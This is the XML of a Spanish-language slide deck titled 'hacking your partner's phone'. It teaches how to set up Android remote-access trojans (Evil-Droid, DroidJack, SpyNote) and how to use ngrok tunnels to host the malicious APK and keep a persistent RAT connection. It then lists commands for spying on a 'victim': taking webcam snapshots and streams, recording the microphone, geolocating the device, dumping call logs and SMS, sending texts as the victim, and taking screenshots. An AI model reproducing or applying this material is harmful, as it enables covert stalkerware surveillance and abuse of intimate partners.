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335" r:id="rId4"/>
    <p:sldId id="334" r:id="rId5"/>
    <p:sldId id="338" r:id="rId6"/>
    <p:sldId id="353" r:id="rId7"/>
    <p:sldId id="354" r:id="rId8"/>
    <p:sldId id="341" r:id="rId9"/>
    <p:sldId id="349" r:id="rId10"/>
    <p:sldId id="361" r:id="rId11"/>
    <p:sldId id="363" r:id="rId12"/>
    <p:sldId id="364" r:id="rId13"/>
    <p:sldId id="345" r:id="rId14"/>
    <p:sldId id="365" r:id="rId15"/>
    <p:sldId id="356" r:id="rId16"/>
    <p:sldId id="357" r:id="rId17"/>
    <p:sldId id="359" r:id="rId18"/>
    <p:sldId id="360" r:id="rId19"/>
    <p:sldId id="362" r:id="rId20"/>
    <p:sldId id="260" r:id="rId21"/>
    <p:sldId id="265" r:id="rId22"/>
    <p:sldId id="312" r:id="rId23"/>
    <p:sldId id="313" r:id="rId24"/>
    <p:sldId id="317" r:id="rId25"/>
    <p:sldId id="318" r:id="rId26"/>
    <p:sldId id="314" r:id="rId27"/>
    <p:sldId id="315" r:id="rId28"/>
    <p:sldId id="316" r:id="rId29"/>
    <p:sldId id="319" r:id="rId30"/>
    <p:sldId id="320" r:id="rId31"/>
    <p:sldId id="321" r:id="rId32"/>
    <p:sldId id="322" r:id="rId33"/>
    <p:sldId id="323" r:id="rId34"/>
    <p:sldId id="326" r:id="rId35"/>
    <p:sldId id="328" r:id="rId36"/>
    <p:sldId id="329" r:id="rId37"/>
    <p:sldId id="330" r:id="rId38"/>
    <p:sldId id="337" r:id="rId39"/>
    <p:sldId id="344" r:id="rId40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60257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9555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967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989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754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1720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2503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2476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2649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2398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0377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D1BE0-AB3B-4531-9085-7A6BB0A907E2}" type="datetimeFigureOut">
              <a:rPr lang="es-PE" smtClean="0"/>
              <a:t>24/05/2020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36553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67946" y="3422865"/>
            <a:ext cx="10256107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HACKEANDO EL CELULAR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5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 TU ENAMORADO (A)</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="54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293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071273" y="107162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02</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="40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071273" y="156297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632707" y="2770014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1. Servidor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FREE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s-ES" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill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3632706" y="3471860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Nos servirá para compartir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2757346" y="4050440"/>
            <a:ext cx="6469782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nuestra apk con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cualquier persona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3272735" y="4932617"/>
            <a:ext cx="5439004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ngrok http -región eu 80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill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922989" y="172009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Subir nuestro virus a la internet</a:t>
            </a:r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257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 descr="https://www.androidcentral.com/sites/androidcentral.com/files/styles/w550h500/public/wallpapers/evil-android-9rs.jpg?itok=CMnLgu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687773"/>
            <a:ext cx="5238750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087749" y="4804765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6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EVIL DROID</a:t>
            </a:r>
          </a:p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NIVEL III</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE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747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087749" y="3840935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6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BACKDOOR 2018</a:t>
            </a:r>
          </a:p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100% FUD</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE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244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594923" y="3509963"/>
            <a:ext cx="11002154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INSTALLATION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="es-ES" sz="2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git clone https://github.com/M4sc3r4n0/Evil-Droid.git</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-PE" sz="2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cd Evil-Droid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-PE" sz="2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chmod +x evil-droid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-PE" sz="2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./evil-droid</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="687386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898452" y="705838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NGROK</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="48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377" y="1667090"/>
            <a:ext cx="4819244" cy="3732723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0074876" y="156282"/>
            <a:ext cx="2042629" cy="4106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i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KALI LINUX</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="2400" b="1" i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997130" y="498882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https://ngrok.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="24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10640" y="5875626"/>
            <a:ext cx="90719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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="802036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36816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01 </a:t>
            </a:r>
            <a:b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(CUENTA GRATUITA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="40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EJECUTAR NGROK Y OBTENER TCP &amp; PUERTO PARA </a:t>
            </a:r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RAT</a:t>
            </a:r>
          </a:p>
          <a:p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./ngrok tcp 4444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1036609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36816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01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4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(SI PAGASTE UNA MEMBRESIA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="40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MANTENER TCP Y PUERTO PARA </a:t>
            </a:r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RAT PERSISTENTE</a:t>
            </a:r>
          </a:p>
          <a:p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./ngrok tcp --remote-addr 1.tcp.ngrok.io:21011 22</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117247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997131" y="101155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BENEFICIOS NGROK</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="40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071273" y="156297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Mantener una IP Estática (Comando 02)</a:t>
            </a:r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48685" y="2965236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IP dinámica </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="32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✘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6628561" y="2965235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IP Estática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48684" y="366708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181.176.65.46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6628561" y="3667081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0.tcp.ngrok.io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548684" y="424566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180.110.40.40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6628560" y="424965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0.tcp.ngrok.io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548684" y="5127839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SÍ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Perderás el acceso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="32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✘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6710939" y="5127839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NO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perderás el Acceso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601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071273" y="107162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LÓGICA NGROK</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="40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071273" y="156297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48685" y="2965236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1. IP NgroK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill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6628561" y="2965235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2. Puerto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48684" y="366708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La IP se obtiene haciendo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6628561" y="3667081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El puerto es el que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548684" y="424566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Un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ping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al DNS NgroK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6628560" y="424965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nos asigna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la sintaxis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548684" y="5127839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ping 0.tcp.ngrok.io </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill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6710939" y="5127839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./ngrok tcp 4444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922989" y="172009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Necesitamos 02 cosas:</a:t>
            </a:r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05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071273" y="107162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02</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="40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071273" y="156297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632707" y="2770014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1. Servidor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FREE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s-ES" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill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3632706" y="3471860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Nos servirá para compartir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2757346" y="4050440"/>
            <a:ext cx="6469782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nuestra apk con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cualquier persona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3272735" y="4932617"/>
            <a:ext cx="5439004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./ngrok http -región eu 80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill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922989" y="172009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Subir nuestro virus a la internet</a:t>
            </a:r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268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087749" y="4302253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NIVEL I</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE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droidjack.net/img/homepage-slider/slid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693" y="1606677"/>
            <a:ext cx="7181850" cy="2695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0668000" y="156282"/>
            <a:ext cx="1449505" cy="4106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i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First Tool</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="2400" b="1" i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997131" y="5002468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https://github.com/Pericena/Droidjack</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="24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A0B0AACB-165A-4CC5-BFB2-C0FBA8823861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044669" y="73343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Con poner en Google: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-E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anose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>droidjack github</a:t>
            </a:r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lo encontrarás</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="24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9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63498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01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sysinfo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1100101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62675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02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webcam_list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2670369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61851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03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webcam_snap -i 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="604149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610276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04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webcam_snap -i 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14692789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524680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05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webcam_snap -i 2 -p /root/foto.jpeg -v false</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4129263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04688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06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webcam_snap -i 2 –p /root/foto.jpeg –v true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28266777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44551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07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webcam_stream -i 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4158490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453758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08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webcam_stream -i 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3123791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42080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09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webcam_stream -i 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30340729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04688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10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record_mic –d 20 -f ctho.wav –p false</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="597258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67946" y="3422865"/>
            <a:ext cx="10256107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HACKING EN TIEMPO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5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REAL</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="54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772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04688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11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4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br>
              <a:rPr lang="es-ES" sz="4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48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Aplicaciones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4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Abiertas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="48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4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s-ES" sz="48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ps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24603303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04688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12 </a:t>
            </a:r>
            <a:b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48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System of Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="4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s-ES" sz="48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pwd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11826568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346666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13 </a:t>
            </a:r>
            <a:b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check_root</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="67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603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04688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14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="44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LOCALIZAR A TU VICTIMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="57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br>
              <a:rPr lang="es-ES" sz="57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wlan_geolocate</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="67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4559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137173" y="1864198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14</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://i1.wp.com/4.bp.blogspot.com/-4BeOPXBhO78/Vvz8S6MLbGI/AAAAAAAAL10/jimrftcBCPIBUP3ZGsOEQl0t91yUT8MZw/s1600/2.png?zoom=1.100000023841858&amp;w=687&amp;ssl=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660" y="3228528"/>
            <a:ext cx="9116097" cy="713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6460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022170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15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="40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REGISTRO DE LLAMADAS DE TU VICTIMA</a:t>
            </a:r>
          </a:p>
          <a:p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dump_calllog</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="67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629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04688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16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="40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LEYENDO LOS MENSAJES DE MI VICTIMA</a:t>
            </a:r>
          </a:p>
          <a:p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dump_sms</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="67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5134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36816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17</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="40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ENVIANDO MENSAJES DE MI VICTIMA</a:t>
            </a:r>
          </a:p>
          <a:p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send_sms –d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-PE" sz="57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989233478</a:t>
            </a:r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-t powned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34396113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63498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PREMIUM</a:t>
            </a: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screenshot -v true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10385166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https://cde.peru.com/ima/0/1/6/2/5/1625247/924x530/fot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1422745"/>
            <a:ext cx="8801100" cy="504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640080" y="300382"/>
            <a:ext cx="10554789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VIENDO TODO LO QUE HACE LAS 24 HORAS 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s-PE" sz="32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570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087749" y="2448733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6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SPYNOTE</a:t>
            </a:r>
          </a:p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NIVEL II</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE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rozup.ir/view/2246916/spynote-v4-640x27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270714"/>
            <a:ext cx="6096000" cy="261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0404388" y="156282"/>
            <a:ext cx="1713117" cy="4106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i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Second Tool</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="2400" b="1" i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854517" y="5752023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https://github.com/miladzero/SpyNote</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="24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D679BB3E-FA23-4883-B2CB-40E58C61364E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="854517" y="41375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Con poner en Google: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" b="1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anose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>spynote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-E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anose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> github</a:t>
            </a:r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lo encontrarás</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="24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09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898452" y="731005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NGROK</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="48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377" y="1667090"/>
            <a:ext cx="4819244" cy="3732723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0074876" y="156282"/>
            <a:ext cx="2042629" cy="4106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i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WINDOWS</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="2400" b="1" i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997130" y="498882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https://ngrok.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="24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36320" y="5875626"/>
            <a:ext cx="9620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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip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CC6481FC-937B-4B28-818B-0D7D00F571BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747749" y="-116143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Con poner en Google: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" b="1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anose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-E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s-ES" sz="2400" b="1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anose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="24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lo encontrarás</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="24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685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36816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01 </a:t>
            </a:r>
            <a:b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(CUENTA GRATUITA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="40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EJECUTAR NGROK Y OBTENER TCP &amp; PUERTO PARA </a:t>
            </a:r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RAT</a:t>
            </a:r>
          </a:p>
          <a:p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ngrok tcp 4444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="941029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36816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COMANDO 01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4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(SI PAGASTE UNA MEMBRESIA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="4000" b="1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MANTENER TCP Y PUERTO PARA </a:t>
            </a:r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RAT PERSISTENTE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-PE" sz="5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ngrok tcp --remote-addr 1.tcp.ngrok.io:21011 22</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3592236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997131" y="101155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BENEFICIOS NGROK</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="40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071273" y="156297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Mantener una IP Estática (Comando 02)</a:t>
            </a:r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48685" y="2965236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IP dinámica </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="32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✘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6628561" y="2965235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IP Estática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48684" y="366708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181.176.65.46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6628561" y="3667081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0.tcp.ngrok.io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548684" y="424566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180.110.40.40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6628560" y="424965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0.tcp.ngrok.io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548684" y="5127839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SÍ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Perderás el acceso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="32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✘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6710939" y="5127839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NO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perderás el Acceso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906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071273" y="107162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LÓGICA NGROK</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="40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071273" y="156297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48685" y="2965236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1. IP NgroK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill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6628561" y="2965235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2. Puerto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48684" y="366708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La IP se obtiene haciendo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6628561" y="3667081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El puerto es el que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548684" y="424566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Un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ping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al DNS NgroK</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="32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6628560" y="4249652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nos asigna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la sintaxis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548684" y="5127839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ping 0.tcp.ngrok.io </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill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6710939" y="5127839"/>
            <a:ext cx="4719061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ngrok tcp 4444</a:t>
            </a:r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s-ES" sz="3200" b="1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✔</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="32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922989" y="172009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>
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Necesitamos 02 cosas:</a:t>
            </a:r>
            <a:endParaRPr lang="es-PE" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="8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3360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11316</TotalTime>
  <Words>670</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>135</Paragraphs>
  <Slides>39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4" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black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Martinez</dc:creator>
  <cp:lastModifiedBy>Daniel Martinez</cp:lastModifiedBy>
  <cp:revision>165</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-04-12T23:17:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-25T00:44:01Z</dcterms:modified>
</cp:coreProperties>
</file>